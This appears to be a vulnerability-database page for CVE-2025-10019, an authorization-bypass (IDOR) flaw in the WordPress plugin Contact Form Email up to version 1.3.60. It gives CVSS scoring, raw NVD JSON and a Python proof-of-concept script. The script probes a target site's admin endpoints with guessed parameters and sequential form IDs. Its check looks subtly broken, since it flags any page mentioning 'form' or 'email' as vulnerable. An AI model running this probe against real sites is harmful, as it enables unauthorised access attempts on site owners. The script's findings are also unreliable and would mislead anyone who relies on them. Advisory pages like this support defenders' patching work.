Security Vulnerability Report
中文
CVE-2025-10019 CVSS 6.5 MEDIUM

CVE-2025-10019

Published: 2025-12-18 08:15:49
Last Modified: 2026-04-27 17:16:24

Description

Authorization Bypass Through User-Controlled Key vulnerability in codepeople Contact Form Email contact-form-to-email allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form Email: from n/a through <= 1.3.60.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Contact Form Email (WordPress插件) <= 1.3.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10019 PoC - Contact Form Email IDOR Vulnerability # Affected: Contact Form Email Plugin <= 1.3.60 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-10019 This PoC attempts to access/modify form data by manipulating object IDs """ # Target WordPress site with Contact Form Email plugin target = target_url.rstrip('/') # Try to access form data with manipulated IDs (IDOR test) # Common endpoints for Contact Form Email plugin endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=contact_form_to_email', '/?page_id=cf7_to_email', ] print(f"[*] Testing {target} for CVE-2025-10019") print(f"[*] Vulnerability: IDOR in Contact Form Email Plugin") print(f"[*] CVSS: 6.5 (Medium)") print() # Test IDOR by manipulating form IDs for endpoint in endpoints: url = f"{target}{endpoint}" # Try to access form with different IDs test_ids = [1, 2, 3, 100, 999] for test_id in test_ids: # Common parameter names used by the plugin params = { 'action': 'contact_form_to_email_get_form', 'form_id': test_id, 'id': test_id, 'cf7_id': test_id, } try: response = requests.get(url, params=params, timeout=10) # Check if we got data without proper authorization if response.status_code == 200: # Check for sensitive data in response if any(keyword in response.text.lower() for keyword in ['email', 'form', 'config', 'submission', 'data']): print(f"[+] Potential IDOR found at {url}") print(f"[+] Form ID {test_id} returned data without auth") print(f"[+] Response length: {len(response.text)} bytes") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") continue print("[*] Manual testing recommended") print("[*] Try accessing form data with sequential IDs") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-10019-poc.py <target_url>") print("Example: python cve-2025-10019-poc.py http://target.com") sys.exit(1) target_url = sys.argv[1] check_vulnerability(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10019", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:48.657", "lastModified": "2026-04-27T17:16:24.090", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in codepeople Contact Form Email contact-form-to-email allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form Email: from n/a through <= 1.3.60."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/contact-form-to-email/vulnerability/wordpress-contact-form-email-plugin-1-3-59-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}